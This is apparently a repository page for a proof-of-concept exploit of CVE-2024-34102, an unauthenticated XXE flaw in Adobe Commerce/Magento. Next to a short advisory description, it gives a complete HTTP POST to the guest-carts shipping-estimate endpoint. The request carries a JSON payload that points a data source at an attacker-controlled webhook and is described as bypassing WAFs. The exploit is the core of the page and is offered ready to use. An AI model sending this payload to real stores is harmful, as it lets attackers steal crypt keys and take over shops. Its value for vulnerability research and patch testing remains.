
CVE-2024-34102 PoC — XXE can expose crypt key and other secrets granting full admin access

Associated Vulnerability

Title: XXE can expose crypt key and other secrets granting full admin access (CVE-2024-34102)

Description: Adobe Commerce versions 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8 and earlier are affected by an Improper Restriction of XML External Entity Reference ('XXE') vulnerability that could result in arbitrary code execution. An attacker could exploit this vulnerability by sending a crafted XML document that references external entities. Exploitation of this issue does not require user interaction.
Readme
# CVE-2024-34102

PoC for CVE-2024-34102: unauthenticated Magento XXE with WAF bypass. You will get an HTTP connection on your webhook.

```
POST /rest/V1/guest-carts/1/estimate-shipping-methods HTTP/2
Host: example.com
Accept:  application/json, text/javascript, */*; q=0.01
Content-Length: 310
Content-Type: application/json
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36

{
  "address": {
    "totalsCollector": {
      "collectorList": {
        "totalCollector": {
          "sourceData": {
            "data": "http://YOUR-webhook",
            "dataIsURL": true,
            "options": 1337
          }
        }
      }
    }
  }
}
```
File Snapshot

```
[4.0K] /data/pocs/549a8b7f633d11bf575c49f6e3afdbcec39addcd
├── [ 725] README.md
└── [ 151] xxe.xml

0 directories, 2 files
```